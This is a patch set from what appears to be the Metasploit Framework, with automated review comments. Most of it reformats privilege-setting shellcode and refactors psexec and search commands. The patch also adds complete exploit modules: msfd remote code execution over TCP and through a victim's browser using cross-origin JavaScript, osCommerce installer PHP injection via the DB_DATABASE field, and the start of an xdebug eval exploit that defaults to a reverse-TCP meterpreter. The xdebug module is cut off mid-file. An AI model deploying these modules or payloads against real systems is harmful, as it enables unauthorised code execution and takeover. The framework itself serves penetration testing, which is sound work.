"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
# EEK! unsupported...
end
@ -282,10 +282,10 @@ module Msf::Payload::Linux
# Append exit(0)
if (datastore['AppendExit'])
app << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
app << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x02" + # addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end
elsif (test_arch.include?(ARCH_X64))

View File

@ -78,48 +78,48 @@ module Msf::Payload::Osx
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7e" + # movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7f" + # movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xb5" + # movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end
@ -127,56 +127,56 @@ module Msf::Payload::Osx
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x7e" + # or r8, 126 (setreuid=126)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x17" + # or r8, 23 (setuid=23)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x7f" + # or r8, 127 (setregid=127)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" +# shl r8, 23
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" +# shl r8, 1
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" + # shl r8, 23
"\x49\x83\xc8\x5a" + # or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" + # shl r8, 1
"\x49\x83\xc8\x01" + # or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
app << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x01" + # or r8, 1 (exit=1)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
end

View File

@ -75,55 +75,55 @@ module Msf::Payload::Solaris
if (test_arch.include?(ARCH_X86))
# Syscall code
sc = "\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
"\x6a\x65" +# pushl $0x65 #
"\x89\xe6" +# movl %esp,%esi #
"\xf7\x56\x04" +# notl 0x04(%esi) #
"\xf6\x16" # notb (%esi) #
sc = "\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #
"\x6a\x65" + # pushl $0x65 #
"\x89\xe6" + # movl %esp,%esi #
"\xf7\x56\x04" + # notl 0x04(%esi) #
"\xf6\x16" # notb (%esi) #
# Prepend
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xca" +# movb $0xca,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xca" + # movb $0xca,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xcb" +# movb $0xcb,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xcb" + # movb $0xcb,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x2e" +# movb $0x2e,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x2e" + # movb $0x2e,%al #
"\xff\xd6" # call *%esi #
end
# Append
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xff\xd6" # call *%esi #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xff\xd6" # call *%esi #
end
# Prepend syscall code to prepend block

View File

@ -207,7 +207,7 @@ class Db
if names.first == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
print_status("Recreated default workspace")
end
rescue Exception => e
rescue => e
print_error "Failed to rename workspace: #{e.message}"
e.backtrace.each { |line| print_error "#{line}"}
end
@ -544,7 +544,7 @@ class Db
when mode == [:tag]
begin
add_host_tag(host_ranges, tag_name)
rescue ::Exception => e
rescue => e
if e.message.include?('Validation failed')
print_error(e.message)
else
@ -1130,7 +1130,7 @@ class Db
end
framework.db.update_note(update_opts)
rescue Exception => e
rescue => e
elog "There was an error updating note with ID #{note.id}: #{e.message}"
next
end
@ -1333,7 +1333,7 @@ class Db
end
loot.ltype = types.first if types
framework.db.update_loot(loot.as_json.symbolize_keys)
rescue Exception => e
rescue => e
elog "There was an error updating loot with ID #{loot.id}: #{e.message}"
next
end

View File

@ -19,8 +19,9 @@ module Msf
CMD_USE_TIMEOUT = 3
@@search_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner."],
"-S" => [ true, "Row search filter."],
"-h" => [ false, "Help banner"],
"-o" => [ true, "Send output to a file in csv format"],
"-S" => [ true, "Search string for row filter"],
)
def commands
@ -410,7 +411,12 @@ module Msf
end
def cmd_search_help
print_line "Usage: search <keywords>"
print_line "Usage: search [ options ] <keywords>"
print_line
print_line "OPTIONS:"
print_line " -h Show this help information"
print_line " -o <file> Send output to a file in csv format"
print_line " -S <string> Search string for row filter"
print_line
print_line "Keywords:"
{
@ -442,26 +448,29 @@ module Msf
return
end
match = ''
match = ''
search_term = nil
output_file = nil
@@search_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
print_error("Deprecated option. Use type:#{val} instead")
cmd_search_help
return
when "-S", "--search"
when "-S"
search_term = val
when "-h"
cmd_search_help
return
when "-S"
search_term = val
when '-o'
output_file = val
else
match += val + " "
end
}
if match.empty? && search_term.nil?
print_error("Keywords or search argument required\n")
cmd_search_help
return
end
# Display the table of matches
tbl = generate_module_table("Matching Modules", search_term)
Msf::Modules::Metadata::Cache.instance.find(match).each do |m|
@ -472,7 +481,15 @@ module Msf
m.name
]
end
print_line(tbl.to_s)
if output_file
print_status("Wrote search results to #{output_file}")
::File.open(output_file, "wb") { |ofd|
ofd.write(tbl.to_csv)
}
else
print_line(tbl.to_s)
end
end
#
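Review bot: `::File.open(output_file, "wb") { |ofd| ofd.write(tbl.to_csv) }` has no error handling, so a nonexistent directory or unwritable path given to `-o` raises an `Errno` exception out of `cmd_search` instead of a `print_error`; wrap the write in `begin ... rescue ::SystemCallError => e` and report the path and `e.message`. The status line `print_status("Wrote search results to #{output_file}")` is also emitted before the write happens; move it after the block so it is only shown once the file has actually been written.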
@ -487,13 +504,6 @@ module Msf
return @@search_opts.fmt.keys
end
case (words[-1])
when "-r"
return RankingName.sort.map{|r| r[1]}
when "-t"
return %w{auxiliary encoder exploit nop payload post}
end
[]
end

View File

@ -70,9 +70,9 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.3.33'
spec.add_runtime_dependency 'metasploit-payloads', '1.3.34'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.7'
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.8'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS.

View File

@ -5,6 +5,7 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
include Msf::Exploit::Remote::SMB::Client::Psexec
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
@ -92,119 +93,18 @@ class MetasploitModule < Msf::Auxiliary
@ip = ip
# Try and authenticate with given credentials
res = execute_command(text, bat)
if res
for i in 0..(datastore['RETRY'])
Rex.sleep(datastore['DELAY'])
# if the output file is still locked then the program is still likely running
if (exclusive_access(text))
break
elsif (i == datastore['RETRY'])
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
end
end
get_output(text)
end
cleanup_after(text, bat)
end
#
# TODO: the rest shamelessly copypasta from auxiliary/admin/smb/psexec_command
# it should probably be mixin'd. I have changed some of vprint/print tho
# => zerosum0x0
#
# Executes specified Windows Command
def execute_command(text, bat)
# Try and execute the provided command
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
vprint_status("Executing the command...")
begin
return psexec(execute)
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
print_error("Unable to execute specified command: #{e}")
return false
end
end
# Retrive output from command
def get_output(file)
vprint_status("Getting the command output...")
output = smb_read_file(@smbshare, @ip, file)
if output.nil?
print_error("Error getting command output. #{$!.class}. #{$!}.")
return
end
if output.empty?
print_status("Command finished with no output")
return
end
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
# Report output
vprint_good("Command completed successfuly!")
# zerosum0x0: this is better with Verbose off in this case
print_status("Output for \"#{datastore['COMMAND']}\":")
print_line("#{output}")
print_good("Command completed successfuly!")
print_status("Output for \"#{datastore['COMMAND']}\":\n")
print_line("#{output}\n")
report_note(
:rhost => datastore['RHOSTS'],
:rport => datastore['RPORT'],
:type => "psexec_command",
:type => "psexec_command",
:name => datastore['COMMAND'],
:data => output
)
end
# check if our process is done using these files
def exclusive_access(*files)
begin
simple.connect("\\\\#{@ip}\\#{@smbshare}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to get handle: #{accesserror}")
return false
end
files.each do |file|
begin
vprint_status("checking if the file is unlocked")
fd = smb_open(file, 'rwo')
fd.close
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to get handle: #{accesserror}")
return false
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
return true
end
# Removes files created during execution.
def cleanup_after(*files)
begin
simple.connect("\\\\#{@ip}\\#{@smbshare}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
return
end
vprint_status("Executing cleanup...")
files.each do |file|
begin
smb_file_rm(file)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
else
print_good("Cleanup was successful")
end
end
end
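Review bot: the result of `execute_command_with_output(...)` is reported without a nil check, so if the helper returns nil when execution or output retrieval fails, this path still prints "Command completed successfuly!" and files a `report_note` with `:data => nil`. The removed `get_output` returned early on both a nil and an empty result; wrapping the reporting in `unless output.nil? || output.empty?` restores that (the psexec_command hunk in this same commit at least guards on nil). Two smaller points: the `:type => "psexec_command"` line is removed and re-added unchanged, which looks like an indentation-only edit, and "successfuly" is misspelled in the new `print_good`.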

View File

@ -69,112 +69,22 @@ class MetasploitModule < Msf::Auxiliary
print_error("Unable to authenticate with given credentials: #{autherror}")
return
end
res = execute_command(text, bat)
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
if res
for i in 0..(datastore['RETRY'])
Rex.sleep(datastore['DELAY'])
# if the output file is still locked then the program is still likely running
if (exclusive_access(text))
break
elsif (i == datastore['RETRY'])
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
end
end
get_output(text)
unless output.nil?
print_good("Command completed successfuly!")
print_status("Output for \"#{datastore['COMMAND']}\":\n")
print_line("#{output}\n")
report_note(
:rhost => datastore['RHOSTS'],
:rport => datastore['RPORT'],
:type => "psexec_command",
:name => datastore['COMMAND'],
:data => output
)
end
cleanup_after(text, bat)
disconnect
end
end
# Executes specified Windows Command
def execute_command(text, bat)
# Try and execute the provided command
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
print_status("Executing the command...")
begin
return psexec(execute)
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
print_error("Unable to execute specified command: #{e}")
return false
end
end
# Retrive output from command
def get_output(file)
print_status("Getting the command output...")
output = smb_read_file(@smbshare, @ip, file)
if output.nil?
print_error("Error getting command output. #{$!.class}. #{$!}.")
return
end
if output.empty?
print_status("Command finished with no output")
return
end
# Report output
print_good("Command completed successfuly!")
vprint_status("Output for \"#{datastore['COMMAND']}\":")
vprint_line("#{output}")
report_note(
:rhost => datastore['RHOSTS'],
:rport => datastore['RPORT'],
:type => "psexec_command",
:name => datastore['COMMAND'],
:data => output
)
end
# check if our process is done using these files
def exclusive_access(*files)
begin
simple.connect("\\\\#{@ip}\\#{@smbshare}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_status("Unable to get handle: #{accesserror}")
return false
end
files.each do |file|
begin
print_status("checking if the file is unlocked")
fd = smb_open(file, 'rwo')
fd.close
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_status("Unable to get handle: #{accesserror}")
return false
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
return true
end
# Removes files created during execution.
def cleanup_after(*files)
begin
simple.connect("\\\\#{@ip}\\#{@smbshare}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
return
end
print_status("Executing cleanup...")
files.each do |file|
begin
smb_file_rm(file)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
else
print_good("Cleanup was successful")
end
end
end
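Review bot: the new `unless output.nil?` guard only covers a nil result; the removed `get_output` also returned early with "Command finished with no output" when the output file was empty. If `execute_command_with_output` hands back an empty string in that case, the module now prints a blank output block and records a note with empty `:data`; `unless output.nil? || output.empty?` keeps the old behaviour. Also, `cleanup_after(text, bat)` is dropped together with the local helper, so confirm that the mixin helper removes the batch and output files itself, otherwise they are left behind on the target share.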

View File

@ -55,6 +55,11 @@ class MetasploitModule < Msf::Exploit::Remote
])
end
# This module returns false positives for credentialed logins
def autofilter
false
end
def telnet_timeout
(datastore['TelnetTimeout'] || 10).to_i
end
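Review bot: the comment on `autofilter` says why the override exists but not what it changes. Returning false takes the module out of automatic exploit selection based on service and port matching; a second comment line saying so (for example "so disable automatic targeting") saves the reader from having to know the framework convention.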

View File

@ -0,0 +1,77 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit msfd Remote Code Execution via Browser',
'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. This module connects to the msfd-socket
through the victim's browser.
To execute msfconsole-commands in JavaScript from a web application,
this module places the payload in the POST-data. These POST-requests
can be sent cross-domain and can therefore be sent to localhost on the
victim's machine. The msfconsole-command to execute code is 'rbi -e
"CODE"'.
Exploitation when the browser is running on Windows is unreliable and
the exploit is only usable when IE is used and the quiet-flag has been
passed to msf-daemon.
},
'License' => BSD_LICENSE,
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Targets' =>
[
[ 'Automatic', {}],
],
'Payload' =>
{
'Space' => 8192, # Arbitrary limit
'DisableNops' => 'True',
'BadChars' => "\x22\x0a"
},
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options([
OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
])
end
def exploit
super
end
def on_request_uri(cli, request)
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
sc = payload.encoded
shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
var1 = rand_text_alpha(rand(6..11))
var2 = rand_text_alpha(rand(6..11))
html = <<-EOS
<html>
<head></head>
<body>
<script>
var #{var1} = new XMLHttpRequest();
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
var #{var2} = String("#{shellcode}");
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
</script>
</body>
</html>
EOS
print_status("#{msg} Sending HTML...")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end
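Review bot: the JavaScript escape built in `on_request_uri` is wrong for small byte values: `sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")` emits one hex digit for anything below 0x10 (a tab becomes `\x9`), and JavaScript requires exactly two hex digits after `\x`, so such a byte in the encoded payload turns the injected string into a syntax error; `'U'` also decodes UTF-8 rather than raw bytes. `sc.unpack('C*').map { |b| '%02x' % b }` with the `\\x` prefix fixes both. Other points in this file: `'DisableNops' => 'True'` is a string where the TCP msfd module in this commit uses the boolean `true`; the description names the command as `rbi -e "CODE"` while the page sends `irb -e`; `def exploit; super; end` is a no-op override; and `REMOTE_IP`/`REMOTE_PORT` could be `OptAddress`/`OptPort` so the framework validates them.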

View File

@ -0,0 +1,100 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'osCommerce Installer Unauthenticated Code Execution',
'Description' => %q{
If the /install/ directory was not removed, it is possible for an unauthenticated
attacker to run the "install_4.php" script, which will create the configuration
file for the installation. This allows the attacker to inject PHP code into the
configuration file and execute it.
},
'Author' => [
'Simon Scannell', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '44374'],
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'osCommerce 2.3.4.1', { } ],
],
'DisclosureDate' => 'Apr 30 2018',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI'], 'install.php'),
'method' => 'GET'
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 200 && res.body.include?('osCommerce Website')
return CheckCode::Safe
end
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI'], 'index.php'),
'method' => 'GET'
})
if res.body.include?('configure.php') && res.body.include?('The following files need to have their file permissions set to world-writeable (chmod 777):')
vprint_error 'configure.php is not writable'
return CheckCode::Safe
end
CheckCode::Appears
end
def trigger
send_request_cgi({
'uri' => normalize_uri(datastore['URI'], 'includes/configure.php'),
'method' => 'GET'
})
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
data = {
'DIR_FS_DOCUMENT_ROOT' => './',
'DB_DATABASE' => "');#{payload.encoded}/*"
}
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI'], 'install.php?step=4'),
'method' => 'POST',
'vars_post' => data
})
trigger
end
end
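Review bot: the second `send_request_cgi` in `check` (the request for `index.php`) is not nil-checked before `res.body.include?(...)`, so a dropped connection between the two requests raises `NoMethodError` instead of returning `CheckCode::Unknown`. The query string is also baked into the path with `normalize_uri(datastore['URI'], 'install.php?step=4')`; passing `'vars_get' => { 'step' => '4' }` keeps `normalize_uri` from treating `?step=4` as a path component. Minor: `res` in `exploit` is assigned and never read, and `trigger` discards its response, so a failed trigger is silent.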

View File

@ -0,0 +1,66 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit msfd Remote Code Execution',
'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. If this socket is accessible on a remote
interface, an attacker can execute commands on the victim's machine.
If msfd is running with higher privileges than the current local user,
this module can also be used for privilege escalation. In that case,
port forwarding on the compromised host can be used.
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
},
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
'License' => BSD_LICENSE,
'Platform' => "ruby",
'Arch' => ARCH_RUBY,
'Payload' =>
{
'Space' => 8192, # Arbitrary limit
'BadChars' => "\x27\x0a",
'DisableNops' => true
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(55554)
])
end
def check
connect
data = sock.get_once
if data.include?("msf")
disconnect
return Exploit::CheckCode::Appears
end
disconnect
return Exploit::CheckCode::Unknown
end
def exploit
connect
sock.get_once
sock.put "irb -e '" + payload.encoded + "'\n"
disconnect
end
end
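Review bot: `data = sock.get_once` in `check` can return nil (read timeout, or the service closing without a banner), and `data.include?("msf")` then raises `NoMethodError` instead of returning a CheckCode; guard with `if data && data.include?("msf")`. Also, a connection that succeeds but shows no msf banner returns `CheckCode::Unknown`, where `CheckCode::Safe` is the more accurate answer for a port that responded but is not msfd, and the two `disconnect` calls can be collapsed into an `ensure`.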

View File

@ -0,0 +1,114 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
'DisclosureDate' => 'Sep 17 2017',
'Author' => [
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
'Shaksham Jaiswal', # MinatoTW
'Mumbai' # Austin Hudson
],
'References' => [
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
['URL', 'https://paper.seebug.org/397/']
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => [ARCH_PHP],
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
register_options([
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
Opt::RPORT(80),
